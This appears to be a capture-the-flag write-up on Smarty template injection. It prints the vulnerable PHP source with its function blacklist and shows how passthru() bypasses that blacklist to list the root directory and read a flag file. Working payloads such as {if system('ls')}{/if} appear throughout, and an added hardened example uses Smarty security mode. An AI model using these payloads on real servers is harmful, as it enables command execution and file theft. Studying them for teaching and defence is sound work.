Opening the URL returns a single line of text.
Passing the parameter a= returns a chunk of source code, so this does look like Smarty template injection (SSTI).
Common payloads:
{if phpinfo()}{/if}
{if system('ls')}{/if}
{if readfile('/flag')}{/if}
{if show_source('/flag')}{/if}
{if system('cat …/…/…/flag')}{/if}
In Smarty, PHP statements can be executed inside the {if} tag.
<?php
include('./libs/Smarty.class.php');
echo "pass a parameter and maybe the flag file's filename is random :>";
$smarty = new Smarty();
if ($_GET) {
    highlight_file('index.php');
    foreach ($_GET as $key => $value) {
        print $key . "\n";
        // Blacklist 1: anything mentioning "flag" renders the static template instead
        if (preg_match("/flag|\/flag/i", $value)) {
            $smarty->display('./template.html');
        // Blacklist 2: a list of dangerous PHP function names (case-insensitive)
        } elseif (preg_match("/system|readfile|gz|exec|eval|cat|assert|file|fgets/i", $value)) {
            $smarty->display('./template.html');
        } else {
            // Anything that survives both blacklists is compiled as a Smarty template
            // via the "eval:" resource, so Smarty tags in the value are executed
            $smarty->display("eval:" . $value);
        }
    }
}
?>
The regex /system|readfile|gz|exec|eval|cat|assert|file|fgets/ filters all of those functions, but passthru() is not on the list.
Construct the payload {if passthru('ls')}{/if} to list the current directory: nothing there.
Construct the payload {if passthru('ls ../.././')}{/if} to traverse three levels up to the root directory, where a file named _9909 turns up.
Construct the payload {if passthru('tac /_9909')}{/if} to get the flag.
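The root cause above is that a blacklist guards a value that is then compiled as template source, so any function name missing from the list (here passthru) gets through. As an added example that is not part of the challenge code, the following shows the fix a defender would make: pass the value to Smarty as data rather than as a template, and enable Smarty's security policy as a second layer. It assumes Smarty 3 at ./libs/Smarty.class.php (as on the page) and a hypothetical ./template.html containing {$value|escape}.

```php
<?php
// Added example, not the challenge's own code.
// Assumes Smarty 3 at ./libs/Smarty.class.php and a template file
// ./template.html whose body is: {$value|escape}
require_once './libs/Smarty.class.php';

// Vulnerable pattern from the challenge: the user value becomes the template
// itself, so a function-name blacklist is the only defence and it misses
// passthru(), shell_exec(), proc_open(), ... as soon as one name is forgotten.
function render_unsafe(Smarty $smarty, string $value): void
{
    $smarty->display('eval:' . $value);
}

// Hardened: the value is assigned as a template variable. Smarty never
// compiles it, so a string such as "{if passthru('ls')}{/if}" is simply
// printed (and HTML-escaped by the |escape modifier in template.html).
function render_safe(Smarty $smarty, string $value): void
{
    $smarty->assign('value', $value);
    $smarty->display('./template.html');
}

$smarty = new Smarty();

// Defence in depth: Smarty's security mode restricts which PHP functions a
// template may call. The default policy allows only a small set (isset,
// empty, count, sizeof, in_array, is_array, time), so a template containing
// {if passthru('ls')} fails at compile time with a SmartyCompilerException
// even if some code path still compiles user input by mistake.
$smarty->enableSecurity();

$value = $_GET['a'] ?? '';
render_safe($smarty, $value);
```

Unlike the blacklist, the allow-list in security mode denies by default, which is the property the original filter lacked.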